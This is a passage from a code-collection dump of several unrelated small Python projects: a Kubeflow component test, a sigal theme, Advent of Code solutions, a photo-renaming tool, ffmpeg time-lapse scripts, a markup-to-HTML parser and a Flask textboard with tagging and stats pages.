except Conflict:
pass
```
#### File: tests/components/test_python_pipeline_to_graph_component.py
```python
import os
import sys
import unittest
from collections import OrderedDict
from pathlib import Path
import kfp.components as comp
from kfp.components._python_to_graph_component import create_graph_component_spec_from_pipeline_func
class PythonPipelineToGraphComponentTestCase(unittest.TestCase):
def test_handle_creating_graph_component_from_pipeline_that_uses_container_components(self):
test_data_dir = Path(__file__).parent / 'test_data'
producer_op = comp.load_component_from_file(str(test_data_dir / 'component_with_0_inputs_and_2_outputs.component.yaml'))
processor_op = comp.load_component_from_file(str(test_data_dir / 'component_with_2_inputs_and_2_outputs.component.yaml'))
consumer_op = comp.load_component_from_file(str(test_data_dir / 'component_with_2_inputs_and_0_outputs.component.yaml'))
def pipeline1(pipeline_param_1: int):
producer_task = producer_op()
processor_task = processor_op(pipeline_param_1, producer_task.outputs['Output 2'])
consumer_task = consumer_op(processor_task.outputs['Output 1'], processor_task.outputs['Output 2'])
return OrderedDict([ # You can safely return normal dict in python 3.6+
('Pipeline output 1', producer_task.outputs['Output 1']),
('Pipeline output 2', processor_task.outputs['Output 2']),
])
graph_component = create_graph_component_spec_from_pipeline_func(pipeline1)
self.assertEqual(len(graph_component.inputs), 1)
self.assertListEqual([input.name for input in graph_component.inputs], ['pipeline_param_1']) #Relies on human name conversion function stability
self.assertListEqual([output.name for output in graph_component.outputs], ['Pipeline output 1', 'Pipeline output 2'])
self.assertEqual(len(graph_component.implementation.graph.tasks), 3)
def test_create_component_from_real_pipeline_retail_product_stockout_prediction(self):
from .test_data.retail_product_stockout_prediction_pipeline import retail_product_stockout_prediction_pipeline
graph_component = create_graph_component_spec_from_pipeline_func(retail_product_stockout_prediction_pipeline)
import yaml
expected_component_spec_path = str(Path(__file__).parent / 'test_data' / 'retail_product_stockout_prediction_pipeline.component.yaml')
with open(expected_component_spec_path) as f:
expected_dict = yaml.safe_load(f)
self.assertEqual(expected_dict, graph_component.to_dict())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "153957/153957-theme",
"score": 2
} |
#### File: 153957-theme/153957_theme/theme.py
```python
from pathlib import Path
from sigal import signals
def get_path():
return str(Path(__file__).resolve().parent)
def theme(gallery):
"""Set theme settings to this theme"""
gallery.settings['theme'] = get_path()
def register(settings):
signals.gallery_initialized.connect(theme)
``` |
{
"source": "153957/advent_of_code",
"score": 3
} |
#### File: advent_of_code/aoc2021/day5.py
```python
from .get_inputs import get_inputs
def part1(lines):
encountered_once = set()
encountered_twice = set()
for line in lines:
start, end = line.split(' -> ')
start_x, start_y = [int(point) for point in start.split(',')]
end_x, end_y = [int(point) for point in end.split(',')]
low_x, high_x = sorted([start_x, end_x])
low_y, high_y = sorted([start_y, end_y])
if low_x == high_x:
for y in range(low_y, high_y + 1):
coordinate = (low_x, y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif low_y == high_y:
for x in range(low_x, high_x + 1):
coordinate = (x, low_y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
return len(encountered_twice)
def part2(lines):
encountered_once = set()
encountered_twice = set()
for line in lines:
start, end = line.split(' -> ')
start_x, start_y = [int(point) for point in start.split(',')]
end_x, end_y = [int(point) for point in end.split(',')]
low_x, high_x = sorted([start_x, end_x])
low_y, high_y = sorted([start_y, end_y])
if low_x == high_x:
for y in range(low_y, high_y + 1):
coordinate = (low_x, y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif low_y == high_y:
for x in range(low_x, high_x + 1):
coordinate = (x, low_y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif (high_x - low_x) == (high_y - low_y):
if (
start_x < end_x and start_y < end_y
or start_x > end_x and start_y > end_y
):
for coordinate in zip(range(low_x, high_x + 1), range(low_y, high_y + 1)):
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
else:
for coordinate in zip(reversed(range(low_x, high_x + 1)), range(low_y, high_y + 1)):
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
return len(encountered_twice)
if __name__ == '__main__':
lines = get_inputs('day5.txt')
print(part1(lines))
print(part2(lines))
```
#### File: advent_of_code/aoc2021/day7.py
```python
from .get_inputs import get_inputs
def part1(positions):
positions = sorted(int(position) for position in positions[0].split(','))
return min(
sum(abs(position - final_position) for position in positions)
for final_position in range(positions[0], positions[-1])
)
def part2(positions):
positions = sorted(int(position) for position in positions[0].split(','))
return min(
sum(abs(position - final_position) * (abs(position - final_position) + 1) // 2 for position in positions)
for final_position in range(positions[0], positions[-1])
)
if __name__ == '__main__':
positions = get_inputs('day7.txt')
print(part1(positions))
print(part2(positions))
``` |
{
"source": "153957/loci",
"score": 3
} |
#### File: loci/reloci/cli.py
```python
import argparse
import pathlib
from importlib import import_module
from reloci.renamer import Renamer
from reloci.worker import Worker
def get_renamer_class(import_path):
renamer_module, _, renamer_class = import_path.rpartition('.')
module = import_module(renamer_module)
return getattr(module, renamer_class)
def get_parser():
parser = argparse.ArgumentParser(
description='Organise photos into directories based on file metadata'
)
parser.add_argument(
'--move',
action='store_true',
help='move instead of copy files to the new locations, removing them from the source location'
)
parser.add_argument(
'--dryrun',
action='store_true',
help='do not move or copy any files, just show the actions it would take'
)
parser.add_argument(
'--renamer',
type=get_renamer_class,
default=Renamer,
help='provide your own BaseRenamer subclass for custom output paths'
)
parser.add_argument('inputpath', type=pathlib.Path)
parser.add_argument('outputpath', type=pathlib.Path)
return parser
def cli():
parser = get_parser()
kwargs = vars(parser.parse_args())
Worker(**kwargs).do_the_thing()
```
#### File: loci/reloci/planner.py
```python
import collections
import pathlib
from dataclasses import dataclass
from exiftool import ExifTool
from tqdm import tqdm
from reloci.file_info import FileInfo
@dataclass
class Map:
source: pathlib.Path
destination: pathlib.Path
class Planner:
def __init__(self, inputpath, outputpath, renamer):
self.input_root = inputpath
self.output_root = outputpath
self.renamer = renamer()
def get_files(self):
return [
path
for path in self.input_root.rglob('*')
if path.is_file() and not path.is_symlink() and not path.name.startswith('.')
]
def get_output_path(self, input_path, exiftool):
try:
file_info = FileInfo(input_path, exiftool)
return self.output_root / self.renamer.get_output_path(file_info)
except LookupError:
return self.get_output_path_from_counterpart(input_path, exiftool)
def get_output_path_from_counterpart(self, input_path, exiftool):
try:
counterpart_path = next(
path
for path in input_path.parent.rglob(f'{input_path.stem}.*')
if path != input_path
)
except StopIteration:
raise LookupError('Unable to find a counterpart file')
file_info = FileInfo(counterpart_path, exiftool)
file_path = self.renamer.get_output_path(file_info)
return self.output_root / file_path.parent / (file_path.stem + input_path.suffix)
def make_plan(self):
"""Create a mapping to know which input files go where in the output"""
plan = collections.defaultdict(list)
destinations = set()
input_paths = self.get_files()
with ExifTool() as exiftool:
for input_path in tqdm(input_paths, desc='Reading input', dynamic_ncols=True):
output_path = self.get_output_path(input_path, exiftool)
if output_path in destinations:
raise Exception(f'Multiple files have the same destination!\n {input_path}\t→\t{output_path}.')
if output_path.is_file():
raise Exception(f'A file already exists at destination path!\n {input_path}\t→\t{output_path}.')
destinations.add(output_path)
plan[output_path.parent].append(
Map(
source=input_path,
destination=output_path,
)
)
return plan
def show_plan(self, plan):
for directory, mappings in plan.items():
print(f'{directory}')
for mapping in mappings:
print(f' {mapping.source}\t→\t{mapping.destination}')
``` |
{
"source": "153957/time-lapse-assemble",
"score": 2
} |
#### File: time-lapse-assemble/scripts/120524_ADL_ARN_EC_Archery.py
```python
import os
import ffmpeg
from time_lapse import output
NAME = os.path.basename(__file__).replace('.py', '')
PATTERNS = [
('/Volumes/Falcon/tl_temp/120524/D90_1/*.tiff', 48), # ARN_003613 - ARN_004715
('/Volumes/Falcon/tl_temp/120524/D700_1/*.tiff', 24), # ADL_101173 - ADL_102042
('/Volumes/Falcon/tl_temp/120524/D90_2/*.tiff', 48), # ARN_004855 - ARN_005341
('/Volumes/Falcon/tl_temp/120524/D90_3/*.tiff', 24), # ARN_005342 - ARN_005515
('/Volumes/Falcon/tl_temp/120524/D90_4/*.tiff', 48), # ARN_005520 - ARN_005983
('/Volumes/Falcon/tl_temp/120524/D700_2/*.tiff', 24), # ADL_102058 - ADL_102240
]
def make_movie():
inputs = [
ffmpeg
.input(pattern, pattern_type='glob', framerate=framerate)
.filter_('deflicker', mode='pm', size=10)
for pattern, framerate in PATTERNS
]
input = ffmpeg.concat(*inputs)
output.create_outputs(input, NAME, verbose=True, framerate=48)
if __name__ == '__main__':
make_movie()
```
#### File: time-lapse-assemble/time_lapse/watermark.py
```python
import os
JOST_FONT = os.path.join(os.path.dirname(__file__), 'fonts/Jost-400-Book.ttf')
FONT_OPTIONS = {
'fontfile': JOST_FONT,
'fontcolor': 'white',
'shadowcolor': 'black',
'x': 'main_w-text_w-line_h',
}
def add_watermark(input, text, subtext, fontsize=32):
watermarked_input = (
input
.drawtext(text=text, fontsize=fontsize, y='main_h-3*line_h', **FONT_OPTIONS)
.drawtext(text=subtext, fontsize=int(fontsize * 0.625), y='main_h-2*line_h', **FONT_OPTIONS)
)
return watermarked_input
``` |
{
"source": "153/lispmark",
"score": 3
} |
#### File: 153/lispmark/parse.py
```python
entity = ["quot", "amp", "lt", "gt", "le", "ge", "hellip",
"nbsp", "ensp", "emsp", "ndash", "mdash",
"hearts", "diams", "clubs", "spades", "loz",
"cent", "pound", "yen", "euro",
"copy", "reg", "trade", "para", "sect", "dagger",
"frac14", "frac12", "frac34",
"micro", "lambda", "divide", "times", "fnof",
"forall", "empty", "isin", "notin", "sum",
"radic", "infin", "there4", "oplus", "otimes",
"cong", "asymp", "equiv",
"aelig", "THORN", "szlig",
"uarr", "larr", "rarr", "darr"]
single = ["br", "hr", "p"]
wrap = ["b", "i", "u", "o", "s", "code",
"tt", "sup", "sub", "div", "span",
"blockquote", "h1", "h2", "h3", "h4",
"ul", "ol", "li",
"html", "body", "head", "title",
"table", "tr", "td", "th"]
arg1 = {"url":"<a href='{0}'>{0}</a>",
"anc":"<a name='{0}'></a>",
"m":"<pre><code>{0}</code></pre>",
"q": "<blockquote>{0}</blockquote>",
"style": "<link rel='stylesheet' type='text/css' href='{0}'>",
"sp": "<span class='spoiler'>{0}</span>",
"/": "({0})",
"'": "{0}",
"!": "<!-- {0} -->"}
arg2 = {"link":"<a href='{0}'>{1}</a>",
"img":"<img src='{0}' title='{1}'></img>"}
arg3 = {}
for tag in single:
arg1[tag] = str("<" + tag + ">{" + "0}")
for tag in wrap:
arg1[tag] = str("<" + tag + ">{" + "0}</" + tag + ">")
args = [i for i in arg1.keys()]
x = [args.append(i) for i in arg2.keys()]
# We call eval_input(input) which calls a
# parse_list() on split_functions(input).
#
# split_functions(input) returns
# a make_list() of tokenize(input).
# tokenize(input) replaces ( and ) with " ( " and " ) "
# after adding the contents of parens to list.
# make_list(tokens) adds to contents of (parens) to a list.
# parse_list() ensures that each item in the make_list is ran
# through markup_strings(parsed) from the inside-out.
#
# markup_strings(input) sends a list through the (sym) symbol
# dictionary, runs input through the (def) define macro,
# tries to run items through (,) the map function,
# runs inp[0] through arg1 if it's in arg1,
# returning arg1[inp[0]].format(inp[1])
# or runs inp[0] through arg2 if it's in arg2,
# returning arg2[inp[0]] formatting inp[1] and inp[2],
# otherwise returning (text in parens).
# css_spoiler() makes sure that spoilers work
def css_spoiler():
print("""<style>\n
.spoiler {color: #000; background-color: #000;
}\n.spoiler:hover {
color:#fff;\n}</style>""")
def tokenize(inp=""): # Thanks <NAME>, lis.py
return inp.replace('(', ' ( ').replace(')', ' ) ').split()
def make_list(tokens): # Thanks <NAME>, lis.py
token = tokens.pop(0)
if '(' == token:
tmp = []
while tokens[0] != ')':
tmp.append(make_list(tokens))
tokens.pop(0)
return tmp
elif ')' == token:
return "?"
else:
return token
def split_functions(inp=""): # Thanks <NAME>, lis.py
return make_list(tokenize(inp))
def markup_strings(inp=""):
if type(inp) is str:
inp = inp[0].split(" ")
if len(inp) < 2 and inp[0] in single:
return f"<{inp[0]}>"
if inp[0] == ",":
newlist = [] # real hacky shit, currently only accepts 1 field
for i in inp[2:]:
newlist.append(inp[1].format(i))
return " ".join(newlist)
if inp[0] == "sym":
return do_sym(inp[1])
elif inp[0] == "def":
return do_def(inp[1:])
if len(inp) < 2:
inp.append(inp[0])
if inp[0] in arg1.keys():
inp[1] = " ".join(inp[1:])
return arg1[inp[0]].format(inp[1])
elif inp[0] in arg2.keys():
if len(inp) > 3:
inp[2] = " ".join(inp[2:])
elif len(inp) < 3:
inp.append(inp[1])
return arg2[inp[0]].format(inp[1], inp[2])
return "(" + " ".join(inp) + ")"
def parse_list(inp=[]):
parsed =[]
for n, i in enumerate(inp):
if type(i) is list:
parsed.append(parse_list(i))
else:
parsed.append(i)
return markup_strings(parsed)
def eval_input(inp=""):
return parse_list(split_functions(inp))\
.replace("\\\\", "\").replace('\ ', '')
def do_sym(inp):
if inp in entity:
return f"&{inp};"
return f"&{inp};"
def do_def(inp=[]):
inp = [i.replace('>', ">").replace('<', "<") \
for i in inp]
if len(inp) < 2:
return None
elif len(inp) > 2:
inp[1] = " ".join(inp[1:])
if inp[0] in args:
return " "
if "{2}" in inp[1]:
arg3[inp[0]] = inp[1]
elif "{1}" in inp[1]:
arg2[inp[0]] = inp[1]
elif "{0}" in inp[1]:
arg1[inp[0]] = inp[1]
else:
single.append(inp[0])
return ' '
def show_entity():
print("<table><tr>")
for n, e in enumerate(entity):
if not (n % 8):
print("<tr>")
print(f"<td>{e}<td>{do_sym(e)}")
print("</table>")
``` |
{
"source": "153lym/Bio_HANN",
"score": 2
} |
#### File: Bio_HANN/model/config.py
```python
import os
from .utils import get_logger, load_vocab, get_processing_word, \
get_trimmed_wordvec_vectors, get_random_wordvec_vectors, positional_embedding
class Config():
def __init__(self, parser, load=True):
"""Initialize hyperparameters and load vocabs
Args:
load_embeddings: (bool) if True, load embeddings into
np array, else None
"""
## parse args
self.parser = parser
# training parameters
parser.add_argument('--gpu', default='1', type=str,
help='gpus')
parser.add_argument('--epochs', default='50', type=int,
help='number of epochs')
parser.add_argument('--dropout', default='0.5', type=float,
help='dropout')
parser.add_argument('--batch_size', default='1', type=int,
help='batch size')
parser.add_argument('--lr', default='0.0001', type=float,
help='learning rate')
parser.add_argument('--lr_method', default='adam', type=str,
help='optimization method')
parser.add_argument('--lr_decay', default='0.99', type=float,
help='learning rate decay rate')
parser.add_argument('--clip', default='10', type=float,
help='gradient clipping')
parser.add_argument('--l2_reg_lambda', default='0.0001', type=float,
help='l2 regularization coefficient')
parser.add_argument('--nepoch_no_imprv', default='5', type=int,
help='number of epoch patience')
parser.add_argument('--num_heads', default='4', type=int,
help='number of attention head')
parser.add_argument('--ffn_dim', default='2048', type=int,
help='number of attention head')
# data and results paths
parser.add_argument('--dir_output', default='output/', type=str,
help='directory for output')
parser.add_argument('--data_root', default='data/', type=str,
help='directory for dataset')
parser.add_argument('--data_name', default='ethambutol/', type=str,
help='name for dataset')
parser.add_argument('--folds', default='', type=str,
help='name for dataset')
# character embedding
parser.add_argument('--embedding_file', default='embedding.txt',
type=str, help='directory for trimmed char embeddings file')
# model hyperparameters
parser.add_argument('--hidden_size_lstm_sentence', default='150', type=int,
help='hidden size of sentence level lstm')
parser.add_argument('--hidden_size_lstm_document', default='150', type=int,
help='hidden size of document level lstm')
parser.add_argument('--cnn_filter_num', default='300', type=int,
help='number of cnn filters for each window size')
parser.add_argument('--attention_size', default='300', type=int,
help='attention size')
parser.add_argument('--num_units', default='128', type=int,
help='the dim of the query,key,value')
parser.add_argument('--restore', action='store_true',
help='whether restore from previous trained model')
parser.add_argument('--random_embeddings', action='store_false',
help='whether use random embedding for characters')
parser.add_argument('--train_accuracy', action='store_false',
help='whether report accuracy while training')
parser.add_argument('--use_cnn', action='store_false',
help='whether use cnn for sentence representation')
parser.add_argument('--use_bilstm', action='store_true',
help='whether use bilstm for sentence representation')
parser.add_argument('--use_transformer', action='store_true',
help='whether use transformer for sentence representation')
parser.add_argument('--use_attention', action='store_true',
help='whether use attention based pooling')
parser.add_argument('--use_doc_attention', action='store_true',
help='whether use doc attention based pooling')
parser.add_argument('--use_doc_bilstm', action='store_false',
help='whether use bilstm for doc representation')
parser.add_argument('--use_doc_transformer', action='store_true',
help='whether use transformer for doc representation')
self.parser.parse_args(namespace=self)
self.dir_model = os.path.join(self.dir_output + '/' + self.data_name + '/' + self.folds, "model.weights")
self.path_log = os.path.join(self.dir_output + '/' + self.data_name + '/' + self.folds, "log.txt")
# dataset
self.filename_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev.txt')
self.filename_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test.txt')
self.filename_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train.txt')
self.word_position_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev_wordposition.txt')
self.word_position_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test_wordposition.txt')
self.word_position_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train_wordposition.txt')
self.sentence_position_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev_sentenceposition.txt')
self.sentence_position_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test_sentenceposition.txt')
self.sentence_position_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train_sentenceposition.txt')
# vocab
self.filename_words = os.path.join('data/' + self.data_name + '/words.txt')
self.filename_tags = os.path.join('data/' + self.data_name + '/tags.txt')
# directory for training outputs
if not os.path.exists('data'):
os.makedirs('data')
# directory for data output
if not os.path.exists(self.dir_output+ '/' + self.data_name+ '/' + self.folds):
os.makedirs(self.dir_output+ '/' + self.data_name+ '/' + self.folds)
if not os.path.exists(self.dir_out_class):
os.makedirs(self.dir_out_class)
# create instance of logger
self.logger = get_logger(self.path_log)
# log the attributes
msg = ', '.join(['{}: {}'.format(attr, getattr(self, attr)) for attr in dir(self) \
if not callable(getattr(self, attr)) and not attr.startswith("__")])
self.logger.info(msg)
# load if requested (default)
if load:
self.load()
def load(self):
"""Loads vocabulary, processing functions and embeddings"""
# 1. vocabulary
self.vocab_words = load_vocab(self.filename_words)
self.vocab_tags = load_vocab(self.filename_tags)
self.nwords = len(self.vocab_words)
self.ntags = len(self.vocab_tags)
# 3. get processing functions that map str -> id
self.processing_word = get_processing_word(self.vocab_words, lowercase=True)
self.processing_tag = get_processing_word(self.vocab_tags,
lowercase=False, allow_unk=False)
# 4. get pre-trained embeddings
if self.random_embeddings:
print('Randomly initializes the character vector....')
self.dim_word = 128
self.embeddings = get_random_wordvec_vectors(self.dim_word, self.vocab_words)
self.word_position_embedding = positional_embedding(12450, position='word', dim=self.dim_word)
if self.use_transformer:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.num_units)
elif self.use_bilstm:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.hidden_size_lstm_document * 2)
elif self.use_cnn:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.cnn_filter_num * 3)
else:
print('Using pre-embedding to initialize the character vector....')
self.embeddings = get_trimmed_wordvec_vectors(self.embedding_file, self.vocab_words)
self.dim_word = self.embeddings.shape[1]
self.word_position_embedding = positional_embedding(12450, position='word', dim=self.dim_word)
if self.use_transformer:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.num_units)
elif self.use_bilstm:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.hidden_size_lstm_document * 2)
elif self.use_cnn:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.cnn_filter_num * 3)
``` |
{
"source": "153/multichan",
"score": 2
} |
#### File: 153/multichan/app.py
```python
from flask import Flask, request, send_from_directory
from home import home
from viewer import viewer
from writer import writer
from whitelist import whitelist
from tags import tags
from atom import atom
from boards import boards
#from admin import admin
#from cookies import cook
import os
import time
import daemon
import refresh
import pagemaker as p
import settings as s
_port = s._port
app = Flask(__name__,
static_url_path = "",
static_folder = "static",)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.register_blueprint(home)
app.register_blueprint(viewer)
app.register_blueprint(writer)
app.register_blueprint(whitelist)
if s.boards == True:
app.register_blueprint(boards)
app.register_blueprint(tags)
app.register_blueprint(atom)
# app.register_blueprint(admin)
# app.register_blueprint(cook)
if not os.path.isdir("./static/cap/"):
os.mkdir("./static/cap/")
if not os.path.isdir("./archive/"):
os.mkdir("./archive/")
@app.errorhandler(404)
def not_found(e):
return p.mk(p.html("404"))
@app.route('/api/')
@app.route('/raw/')
def api_help():
return base_static("help.html")
@app.route('/api/<path:filename>')
@app.route('/raw/<path:filename>')
def base_static(filename):
return send_from_directory(app.root_path + '/threads/', filename)
if __name__ == '__main__':
refresh.main()
daemon.run()
app.run(host="0.0.0.0", port=_port)
print(time.time.now())
print("!", request)
app.run()
```
#### File: 153/multichan/daemon.py
```python
import time
import threading
import refresh
import settings
import mod
def linker():
cnt = 0
while True:
refresh.linksites()
try:
mod.main()
except:
pass
cnt += 1
print(cnt)
time.sleep(settings.refreshtime)
def run():
d = threading.Thread(target=linker)
d.start()
```
#### File: 153/multichan/home.py
```python
from flask import Blueprint, request
from datetime import date
from datetime import timedelta
import tripcode as tr
import pagemaker as p
import settings as s
home = Blueprint("home", __name__)
@home.route('/', strict_slashes=False)
def hello_world():
return p.mk(p.html("home").format(s.name))
@home.route('/rules')
def rules():
return p.mk(p.html("rules"))
@home.route('/about')
def about():
return p.mk(p.html("about"))
@home.route('/trip/<trip>', methods=['POST', 'GET'])
@home.route('/trip/', methods=['POST', 'GET'])
def do_trip(trip=None):
if request.method == "POST":
trip = request.form["trip"]
return "<br>".join([
"#" + trip,
"!" + tr.mk(trip),
"<br>##" + trip,
"!!" + tr.sec(trip)])
elif trip:
return "<br>".join([
"#" + trip,
"!" + tr.mk(trip),
"<br>##" + trip,
"!!" + tr.sec(trip)])
return """<form action='.' method='post'>
<input type='text' name='trip'><input type='submit' value='Go'>"""
@home.route('/stats/')
def counter():
with open("./static/counter.txt", "r") as cnt:
cnt = int(cnt.read().strip())
with open("./static/counter.txt", "w") as update:
update.write(str(cnt + 1))
with open(s.bans, "r") as bans:
bans = bans.read().splitlines()
with open(s.delete, "r") as dele:
dele = dele.read().splitlines()
with open("./threads/list.txt", "r") as threads:
threads = threads.read().splitlines()
with open("./threads/tags.txt", "r") as tags:
tags = tags.read().splitlines()
tcnt = str(len(threads))
lcnt = str(len([t for t in threads if t[:6] == "local "]))
rcnt = str(sum([int(t.split(" ")[3]) for t in threads]))
acnt = str(sum([int(t.split(" ")[4]) for t in threads]))
dcnt = str(len(dele))
bcnt = str(len(bans))
tags = str(len(tags))
atags = str(len(s.tags))
page = []
page.append(" ".join([f"<p><div>You are visitor #{cnt+1}",
"to this stats page at", s.url, "<ul>"]))
page.append(" ".join(["<li>", str(len(s.friends)), "friend servers"]))
page.append(" ".join(["<li>", atags, "featured tags"]))
page.append(" ".join(["<li>", tags, "unique tags<p>"]))
page.append(" ".join(["<li>", lcnt, "local threads"]))
page.append(" ".join(["<li>", tcnt, "known threads<p>"]))
page.append(" ".join(["<li>", rcnt, "local replies"]))
page.append(" ".join(["<li>", acnt, "total replies<p>"]))
page.append(" ".join(["<li>", dcnt, "deleted posts"]))
page.append(" ".join(["<li>", bcnt, "banned addresses"]))
page.append("</ul></div>")
return p.mk("\n".join(page))
@home.route('/friends')
def friends():
title = "<div><h1>Friends of " + s.name
title += "</h1><h4>" + s.url
if s.images:
title += f"<p>images: <a href='{s.ihost}'>{s.ihost}</a><br>"
else:
title += "<p>Images not enabled!"
if s.boards:
title += "<br><a href='/b/'>Boards enabled</a>"
else:
title += "<br>Boards not enabled!"
title += "</h4>"
title += "Friends are other multichan websites that "
title += "this server downloads threads and comments from."
flist = []
fstring = "<li> <a href='{1}'>{0}</a> {1}"
for f in s.friends:
flist.append(fstring.format(f, s.friends[f]))
flist = "<ul>" + "\n".join(flist) + "</ul>"
page = title + flist + "</div>"
return p.mk(page)
def norm2dqn(year, month, day):
dqnday = date(1993, 8, 31)
norm = date(year, month, day)
print(norm-dqnday)
return (norm - dqnday).days
def dqn2norm(day):
dqnday = date(1993, 8, 31)
norm = dqnday + timedelta(days=day)
print(norm)
return norm
@home.route('/dqn/<mode>/<dokyun>', methods=['POST', 'GET'])
@home.route('/dqn/', methods=['POST', 'GET'])
def dqn(dokyun=None, mode=None):
if request.method == "POST":
dokyun = request.form["dqn"]
mode = request.form["mode"]
if dokyun:
try:
if mode == "n":
print(dokyun)
dokyun = [int(i) for i in dokyun.split("-")]
print(dokyun)
dokyun = norm2dqn(*dokyun)
elif mode == "d":
dokyun = int(dokyun)
dokyun = dqn2norm(dokyun)
return str(dokyun) + "<p><a href='/dqn'>(back)</a>"
except:
return "<a href='/dqn'>/dqn/yyyy-mm-dd</a>"
return """<form action='.' method='post'>
yyyy-mm-dd for normal; just day for DQN.
<br><input type="radio" name="mode" value="d">
<label for="mode">DQN->Normal</label>
<br><input type="radio" name="mode" value="n">
<label for="mode">Normal->DQN</label>
<br><input type='text' name='dqn'>
<br><input type='submit' value='Go'>
</form>"""
```
#### File: 153/multichan/tags.py
```python
import os
from flask import Blueprint, request
import settings as s
import pagemaker as p
tags = Blueprint("tags", __name__)
tlist = s.tags
flist = s.friends
# tags_host("host")
# tags_load()
# tags_view(["tags"])
# tags_addthread("num", ["tags"])
def tags_load(host=""):
tagp = "/".join(["./threads", host, "tags.txt"])
with open(tagp, "r") as tags:
tags = tags.read().splitlines()
tags = [x.split(" ") for x in tags]
tagdb = {}
for t in tags:
tag = t[0]
threads = t[1:]
if "-" in threads[0]:
threads = [x.split("-") for x in threads]
if len(threads) and threads != [""]:
if tag in tagdb:
tagdb[tag] += [t for t in threads if t not in tagdb[tag]]
print(tagdb[tag])
else:
tagdb[tag] = threads
else:
tagdb[tag] = []
return tagdb
def tags_threads(tags=[]):
db = tags_load()
threads = []
tmp = []
for t in tags:
if t in db:
tmp += db[t]
else:
tmp += []
for t in tmp:
if t not in threads and len(t):
threads.append(t)
return threads
def mkhost(host):
hostp = "/".join(["./threads", host])
tagp = hostp + "/tags.txt"
threads = [x.path for x in os.scandir(hostp) if x.is_dir()]
tagd = {}
for thread in threads:
num = thread.split("/")[3]
head = thread + "/head.txt"
with open(head, "r") as head:
tags = head.read().splitlines()
try:
tags = tags[1].split(" ")
except:
tags = ["random"]
for t in tags:
if t not in tagd:
tagd[t] = []
tagd[t].append(num)
tagf = [" ".join([t, *tagd[t]]) for t in tagd]
with open(tagp, "w") as tags:
tags.write("\n".join(tagf))
return
def mksite(remake=0):
tdb = {x: [] for x in tlist}
for f in flist:
if remake:
mkhost(f)
tpath = "/".join(["./threads", f, "tags.txt"])
with open(tpath, "r") as tag:
tag = tag.read().splitlines()
tag = [x.split(" ") for x in tag]
tag = {x[0]: x[1:] for x in tag}
for t in tag:
tag[t] = [[f, x] for x in tag[t]]
if t not in tdb:
tdb[t] = []
tdb[t].append(tag[t])
tagl = []
for t in tdb:
tdb[t] = [y for x in tdb[t] for y in x]
entry = " ".join(["-".join(x) for x in tdb[t]])
tagl.append(" ".join([t, entry]))
tagl = "\n".join(tagl)
with open("./threads/tags.txt", "w") as tagf:
tagf.write(tagl)
return
@tags.route('/tags/')
def tag_index():
tdb = tags_load()
sentry = "<li><b><a href='/tags/{0}/'>{0}</a></b> ({1} discussions)"
oentry = "<li><a href='/tags/{0}/'>{0}</a> ({1} discussions)"
result = ["<div><h1>Conversation tags</h1>",
"Bolded tags are the default tags selected by the site admin."]
result.append("<br>Tags can be combined with the '+' plus sign in URL.")
links = ["<ul>"]
site_tags = {t : len(tdb[t]) for t in tlist}
site_tags = {k: v for k, v in sorted(site_tags.items(),
key= lambda x: int(x[1]))[::-1]}
all_tags = {t : len(tdb[t]) for t in list(tdb.keys()) if t not in tlist}
all_tags = {k: v for k, v in sorted(all_tags.items(),
key= lambda x: int(x[1]))[::-1]}
for t in site_tags:
links.append(sentry.format(t, site_tags[t]))
if site_tags[t] == 1:
links[-1] == links[-1].replace("s)", ")")
links.append("</ul><ul>")
cnt = 0
last = 0
for t in all_tags:
cnt = int(all_tags[t])
if (cnt < last) and (cnt == 1):
links.append("</ul><ul>")
links.append(oentry.format(t, all_tags[t]))
if all_tags[t] == 1:
links[-1] = links[-1].replace("s)", ")")
last = cnt
links.append("</ul></div>")
result.append("\n".join(links))
result = p.mk("\n".join(result))
return result
@tags.route('/tags/<topic>/')
def tag_page(topic):
line = "<tr><td>{0} " \
+ "<td><a href='/threads/{0}/{1}'>{5}</a>" \
+ "<td>{4}"
result = []
ot = "".join(topic)
if "+" in topic:
topic = topic.split("+")
else:
topic = [topic]
result.append("<div><h1> #" + " #".join(topic) + "</h1>")
result.append(" <a href='/create/" + ot + "'>+ create new</a><br>")
result.append("<i>Note: tags can be combined using the "
"+ (plus sign) in the URL</i></div>")
result.append("<p><table>")
result.append("<tr><th>origin<th>title<th>replies")
threads = tags_threads(topic)
with open("./threads/list.txt") as site:
site = site.read().splitlines()
site = [s.split(" ") for s in site]
site = [[*s[:5], " ".join(s[5:])] for s in site
if [s[0], s[1]] in threads]
result[0] += " (" + str(len(site)) + " threads)</h1>"
test = "\n".join([line.format(*t) for t in site])
result.append(test)
result.append("</table>")
result = p.mk("\n".join(result))
return result
if __name__ == "__main__":
mksite(1)
# tags_load() -> db
# tags_threads([]) -> threads
# mkhost()
# mksite()
# tag_index()
#print("\n0chan:")
#tags_load("0chan")
```
#### File: 153/multichan/viewer.py
```python
import os
import time
import re
from flask import Blueprint
from flask import request
import utils as u
import settings as s
import pagemaker as p
import writer
import whitelist
viewer = Blueprint("viewer", __name__)
friends = s.friends
